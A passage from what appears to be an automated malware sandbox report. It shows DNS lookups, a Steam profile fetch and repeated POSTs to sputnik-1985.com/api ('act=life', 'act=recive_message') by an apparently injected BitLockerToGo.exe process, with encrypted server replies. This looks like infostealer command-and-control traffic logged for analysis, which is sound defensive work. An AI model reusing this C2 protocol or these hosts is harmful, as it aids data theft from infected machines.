                                                                                                                                                                                                            Jan 10, 2025 11:34:46.350358963 CET192.168.2.51.1.1.10x94b2Standard query (0)53.210.109.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.602564096 CET1.1.1.1192.168.2.50xda3aName error (3)enterwahsh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.622258902 CET1.1.1.1192.168.2.50xfee1Name error (3)wordyfindy.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.633722067 CET1.1.1.1192.168.2.50x102fName error (3)slipperyloo.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.645395041 CET1.1.1.1192.168.2.50xe069Name error (3)manyrestro.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.655909061 CET1.1.1.1192.168.2.50x51cdName error (3)shapestickyr.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.670572042 CET1.1.1.1192.168.2.50xde78Name error (3)talkynicer.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.683118105 CET1.1.1.1192.168.2.50x82f2Name error (3)curverpluch.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.693346024 CET1.1.1.1192.168.2.50xf2b6Name error (3)tentabatte.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.705284119 CET1.1.1.1192.168.2.50x260Name error (3)bashfulacid.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:27.714346886 CET1.1.1.1192.168.2.50x5b7dNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.019952059 CET1.1.1.1192.168.2.50xba25No error (0)sputnik-1985.com104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.019952059 CET1.1.1.1192.168.2.50xba25No error (0)sputnik-1985.com104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.019952059 CET1.1.1.1192.168.2.50xba25No error (0)sputnik-1985.com104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.019952059 CET1.1.1.1192.168.2.50xba25No error (0)sputnik-1985.com104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.019952059 CET1.1.1.1192.168.2.50xba25No error (0)sputnik-1985.com104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.019952059 CET1.1.1.1192.168.2.50xba25No error (0)sputnik-1985.com104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:29.019952059 CET1.1.1.1192.168.2.50xba25No error (0)sputnik-1985.com104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.095875025 CET1.1.1.1192.168.2.50xb433Name error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:34:46.359170914 CET1.1.1.1192.168.2.50x94b2Name error (3)53.210.109.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                            • steamcommunity.com
                                                                                                                                                                                                            • sputnik-1985.com

                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.549770104.102.49.2544436204C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-10 10:34:28 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Host: steamcommunity.com
                                                                                                                                                                                                            2025-01-10 10:34:28 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 10:34:28 GMT
                                                                                                                                                                                                            Content-Length: 35126
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: sessionid=9cf190a5d991b4bebe33d12e; Path=/; Secure; SameSite=None
                                                                                                                                                                                                            Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                            2025-01-10 10:34:28 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                            2025-01-10 10:34:28 UTC16384INData Raw: 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f
                                                                                                                                                                                                            Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO
                                                                                                                                                                                                            2025-01-10 10:34:28 UTC3768INData Raw: 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f
                                                                                                                                                                                                            Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
                                                                                                                                                                                                            2025-01-10 10:34:28 UTC495INData Raw: 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                            Data Ascii: criber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            1192.168.2.549780104.21.48.14436204C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-10 10:34:29 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-10 10:34:29 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                            2025-01-10 10:34:29 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 10:34:29 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=mhnh1nk4hl94prbe9r05mc29gb; expires=Tue, 06 May 2025 04:21:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cfnfADT1o6BkEsukU0MBpCJ7FWsrh5kmj5TRfIKw8tan1A4%2FX4auk0ApqAs2%2F%2FH08l0RMUOeWMa%2BV6zFk4FlxSplm59YlsEfp2hcsKLh%2F67cLYb2BPDAQlXBpLu4E%2BnV5YvX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8ffc03ceba9e43be-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1553&min_rtt=1544&rtt_var=597&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1806930&cwnd=226&unsent_bytes=0&cid=d93fd9b1dec438d7&ts=445&x=0"
                                                                                                                                                                                                            2025-01-10 10:34:29 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                            2025-01-10 10:34:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            2192.168.2.549787104.21.48.14436204C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-10 10:34:30 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 86
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-10 10:34:30 UTC86OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 62 64 34 65 38 31 39 35 31 33 30 36 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--bd4e81951306&j=b9abc76ce53b6fc3a03566f8f764f5ea
                                                                                                                                                                                                            2025-01-10 10:34:30 UTC1117INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 10:34:30 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=elph9dbe4i5vh6lbte98gjfh15; expires=Tue, 06 May 2025 04:21:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X%2BuByb7wewoRNzuSlAIoaXGi76K15RLW15rN3K9RBBi3uvGXzogO6hdGqSdYFry6ErWoaJExrLBOVF5zIGQgb89eq6st3hoIeZcawLBItA8r4FQlImlKvqfsbtr0zVnUjTkX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8ffc03d4fe2cc323-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1461&min_rtt=1456&rtt_var=557&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=986&delivery_rate=1942781&cwnd=214&unsent_bytes=0&cid=e3ba36ac11e84630&ts=492&x=0"
                                                                                                                                                                                                            2025-01-10 10:34:30 UTC252INData Raw: 34 33 30 63 0d 0a 43 53 47 67 55 72 61 37 5a 35 43 5a 32 68 56 4e 47 77 73 36 7a 43 4a 48 77 30 71 38 6f 61 58 51 57 44 77 65 6e 66 76 31 35 35 4e 79 41 39 5a 77 6a 49 39 4c 73 75 71 2f 4e 33 64 39 61 6c 61 2f 52 32 76 68 4b 39 69 44 6e 37 59 35 55 47 33 34 31 39 65 52 2f 69 73 62 78 6a 50 61 79 41 4b 38 75 37 39 74 62 79 46 51 51 65 35 48 4b 65 46 77 6e 73 54 50 73 6a 6c 51 66 50 79 51 6d 70 66 2f 61 6b 6e 4d 4e 64 37 65 42 50 54 34 74 6e 67 6f 66 6d 35 62 70 6b 77 75 72 69 4c 52 67 34 6e 79 50 55 59 38 70 39 6d 34 67 75 64 6f 62 4d 45 68 33 5a 6b 61 76 4f 4c 34 63 43 4d 35 4d 52 69 74 52 79 57 76 4c 4e 6a 4b 7a 62 67 77 57 48 33 35 6b 59 57 4f 39 57 46 4a 77 6a 62 66 31 41 33 67 39 62 78 2f 49 33 68 6b 57 2b 34 4f 5a 61 59 77 6e 70 75 48 34 51
                                                                                                                                                                                                            Data Ascii: 430cCSGgUra7Z5CZ2hVNGws6zCJHw0q8oaXQWDwenfv155NyA9ZwjI9Lsuq/N3d9ala/R2vhK9iDn7Y5UG3419eR/isbxjPayAK8u79tbyFQQe5HKeFwnsTPsjlQfPyQmpf/aknMNd7eBPT4tngofm5bpkwuriLRg4nyPUY8p9m4gudobMEh3ZkavOL4cCM5MRitRyWvLNjKzbgwWH35kYWO9WFJwjbf1A3g9bx/I3hkW+4OZaYwnpuH4Q
                                                                                                                                                                                                            2025-01-10 10:34:30 UTC1369INData Raw: 68 64 62 65 36 4d 6d 70 58 33 4b 31 79 4d 4b 5a 54 65 43 62 4b 6a 2b 48 38 6a 64 32 78 62 6f 55 63 6b 6f 54 72 52 77 38 53 36 4d 6c 70 32 38 4a 61 59 69 2f 74 73 53 38 73 33 32 39 34 4e 39 50 53 37 4e 32 45 35 62 6b 44 75 47 47 57 42 4f 4e 33 41 30 37 38 72 48 6d 4f 78 67 4e 65 43 2f 53 73 62 67 6a 62 61 32 41 6a 79 36 62 42 38 4a 48 78 37 55 36 64 4e 4b 4b 45 6c 31 4d 7a 45 73 6a 31 55 64 76 43 54 6b 34 6a 38 62 55 50 43 63 4a 71 5a 41 75 71 37 34 44 63 4d 66 48 6c 66 6f 6c 5a 6e 6d 32 6a 42 6a 64 37 79 50 56 49 38 70 39 6d 66 67 50 4a 6f 53 4d 30 7a 33 4e 49 58 38 75 6d 2b 65 69 70 72 62 31 32 67 53 69 61 7a 49 74 44 46 78 4c 73 78 56 33 6e 34 6e 64 66 4c 73 57 78 62 67 6d 69 55 2b 41 6a 35 39 37 4a 67 4c 7a 6c 32 46 72 63 41 49 71 31 6f 68 6f 50 44 73
                                                                                                                                                                                                            Data Ascii: hdbe6MmpX3K1yMKZTeCbKj+H8jd2xboUckoTrRw8S6Mlp28JaYi/tsS8s3294N9PS7N2E5bkDuGGWBON3A078rHmOxgNeC/Ssbgjba2Ajy6bB8JHx7U6dNKKEl1MzEsj1UdvCTk4j8bUPCcJqZAuq74DcMfHlfolZnm2jBjd7yPVI8p9mfgPJoSM0z3NIX8um+eiprb12gSiazItDFxLsxV3n4ndfLsWxbgmiU+Aj597JgLzl2FrcAIq1ohoPDs
                                                                                                                                                                                                            2025-01-10 10:34:30 UTC1369INData Raw: 2f 6e 6f 2f 46 71 53 74 79 31 54 75 57 37 41 62 38 39 62 39 68 62 32 59 6e 51 65 35 48 4b 65 46 77 6e 73 37 50 74 7a 39 52 66 66 57 58 6b 6f 2f 39 59 30 33 42 49 74 76 64 42 66 37 7a 73 6e 6f 68 66 57 46 52 70 55 73 6a 6f 53 6e 55 67 34 6e 79 50 55 59 38 70 39 6d 6a 67 76 31 6d 54 49 41 46 31 39 63 4c 39 65 33 34 61 47 46 67 4b 56 2b 69 41 48 33 68 4a 4e 66 44 7a 4c 67 2b 58 6e 76 79 6e 4a 53 43 38 6d 5a 45 79 44 37 54 33 51 6e 37 39 72 35 33 4b 48 31 73 53 71 74 4a 4b 61 31 6f 6b 49 50 41 71 6e 6f 47 50 4e 43 65 67 59 62 65 61 46 4c 4c 63 4d 75 58 48 4c 4c 38 74 44 64 33 4f 57 35 64 70 6b 73 6a 71 53 6a 4d 78 73 6d 35 4f 31 52 36 2f 70 53 62 67 2f 46 71 51 38 51 38 31 4e 34 43 34 4f 6d 39 63 54 31 7a 4b 52 62 75 52 7a 33 68 63 4a 37 31 31 36 55 72 53 44
                                                                                                                                                                                                            Data Ascii: /no/FqSty1TuW7Ab89b9hb2YnQe5HKeFwns7Ptz9RffWXko/9Y03BItvdBf7zsnohfWFRpUsjoSnUg4nyPUY8p9mjgv1mTIAF19cL9e34aGFgKV+iAH3hJNfDzLg+XnvynJSC8mZEyD7T3Qn79r53KH1sSqtJKa1okIPAqnoGPNCegYbeaFLLcMuXHLL8tDd3OW5dpksjqSjMxsm5O1R6/pSbg/FqQ8Q81N4C4Om9cT1zKRbuRz3hcJ7116UrSD
                                                                                                                                                                                                            2025-01-10 10:34:30 UTC1369INData Raw: 6a 66 6c 6b 54 4d 59 2b 30 74 38 49 39 2f 53 79 5a 53 64 33 5a 46 4f 68 53 7a 65 68 4a 64 72 50 77 37 6f 78 56 44 79 78 32 5a 43 64 73 54 4d 44 39 7a 33 62 32 51 62 6b 75 36 63 35 4e 6a 6c 75 56 4f 34 59 5a 61 30 6d 33 73 7a 4c 76 6a 46 57 66 66 4f 58 6b 49 44 34 59 30 76 51 4d 64 44 52 42 50 7a 30 75 58 4d 71 66 47 31 66 71 6b 59 71 34 57 61 65 78 4e 2f 79 59 68 35 54 32 4b 7a 56 70 4d 73 72 58 49 77 70 6c 4e 34 4a 73 71 50 34 65 79 78 31 59 56 65 6f 53 53 6d 72 49 64 58 50 7a 4c 59 32 56 33 6e 35 6d 4a 4b 41 38 47 39 50 79 44 62 58 32 67 72 39 39 4c 41 33 59 54 6c 75 51 4f 34 59 5a 59 51 2f 31 63 33 42 38 69 55 51 5a 62 2b 65 6d 38 57 70 4b 30 2f 4c 4e 74 4c 63 43 66 50 39 73 48 49 6e 66 57 68 65 71 45 4d 71 70 53 33 66 7a 4d 4f 2b 4e 46 52 39 2f 70 57
                                                                                                                                                                                                            Data Ascii: jflkTMY+0t8I9/SyZSd3ZFOhSzehJdrPw7oxVDyx2ZCdsTMD9z3b2Qbku6c5NjluVO4YZa0m3szLvjFWffOXkID4Y0vQMdDRBPz0uXMqfG1fqkYq4WaexN/yYh5T2KzVpMsrXIwplN4JsqP4eyx1YVeoSSmrIdXPzLY2V3n5mJKA8G9PyDbX2gr99LA3YTluQO4YZYQ/1c3B8iUQZb+em8WpK0/LNtLcCfP9sHInfWheqEMqpS3fzMO+NFR9/pW
                                                                                                                                                                                                            2025-01-10 10:34:30 UTC1369INData Raw: 45 7a 47 4e 39 6a 66 43 76 54 36 76 58 30 6a 66 6d 78 54 6f 55 78 6c 37 32 6a 5a 32 34 66 71 65 6e 42 33 37 49 36 55 69 2f 70 39 57 49 49 76 6d 73 42 46 39 66 66 34 4c 32 39 36 59 6c 4f 71 51 43 6d 68 4c 4e 50 44 31 62 30 39 57 58 58 30 69 35 32 43 39 6d 42 4c 79 54 2f 53 79 77 6e 38 36 62 31 6c 50 54 6b 6e 47 4b 6c 59 5a 66 6c 6f 36 4d 54 58 6f 6a 6b 63 54 65 6d 61 67 59 37 38 5a 77 50 64 66 73 32 5a 41 76 36 37 34 44 63 70 64 6d 42 62 6f 55 45 73 72 53 58 62 79 73 4b 7a 50 46 70 32 39 5a 6d 52 67 2f 42 75 53 63 45 78 33 74 41 43 2b 76 79 37 5a 57 38 33 4b 56 2b 32 41 48 33 68 41 64 6e 52 79 61 4a 36 51 54 4c 6d 32 5a 43 4a 73 54 4d 44 78 6a 72 62 33 51 4c 2b 2f 62 31 78 49 6e 68 6d 57 61 35 50 49 61 6f 68 32 4d 4c 4b 74 7a 64 61 62 76 57 53 6d 49 6e 34
                                                                                                                                                                                                            Data Ascii: EzGN9jfCvT6vX0jfmxToUxl72jZ24fqenB37I6Ui/p9WIIvmsBF9ff4L296YlOqQCmhLNPD1b09WXX0i52C9mBLyT/Sywn86b1lPTknGKlYZflo6MTXojkcTemagY78ZwPdfs2ZAv674DcpdmBboUEsrSXbysKzPFp29ZmRg/BuScEx3tAC+vy7ZW83KV+2AH3hAdnRyaJ6QTLm2ZCJsTMDxjrb3QL+/b1xInhmWa5PIaoh2MLKtzdabvWSmIn4
                                                                                                                                                                                                            2025-01-10 10:34:30 UTC1369INData Raw: 58 65 31 41 62 39 2b 4b 70 32 4b 57 74 70 56 61 52 53 4c 36 6f 74 30 38 37 4b 73 54 78 59 64 2f 4f 4c 6e 6f 58 79 59 41 4f 4d 63 4e 50 42 52 61 71 37 6d 32 41 35 63 32 35 55 75 45 73 6b 6f 6a 37 54 30 34 66 38 65 6b 39 37 37 74 6e 50 6b 2b 46 38 52 4e 31 2b 7a 5a 6b 43 2f 72 76 67 4e 79 6c 77 62 31 2b 6f 54 6a 65 6b 4c 74 48 4d 7a 72 73 2b 56 6e 2f 2f 6e 5a 4f 43 39 47 68 50 79 54 66 58 31 67 48 37 39 62 46 34 62 7a 63 70 58 37 59 41 66 65 45 4a 78 63 44 4c 76 33 70 42 4d 75 62 5a 6b 49 6d 78 4d 77 50 4f 50 74 48 5a 44 2f 54 2f 76 58 45 6c 66 47 6c 54 72 55 38 68 70 79 7a 52 77 38 79 37 4f 31 68 35 39 5a 4b 52 69 50 4a 74 52 59 4a 2b 6c 4e 34 64 73 71 50 34 56 7a 52 30 5a 56 2f 75 58 32 75 34 61 4e 6e 50 68 2b 70 36 56 58 44 37 6e 70 65 49 38 6d 4e 47 78
                                                                                                                                                                                                            Data Ascii: Xe1Ab9+Kp2KWtpVaRSL6ot087KsTxYd/OLnoXyYAOMcNPBRaq7m2A5c25UuEskoj7T04f8ek977tnPk+F8RN1+zZkC/rvgNylwb1+oTjekLtHMzrs+Vn//nZOC9GhPyTfX1gH79bF4bzcpX7YAfeEJxcDLv3pBMubZkImxMwPOPtHZD/T/vXElfGlTrU8hpyzRw8y7O1h59ZKRiPJtRYJ+lN4dsqP4VzR0ZV/uX2u4aNnPh+p6VXD7npeI8mNGx
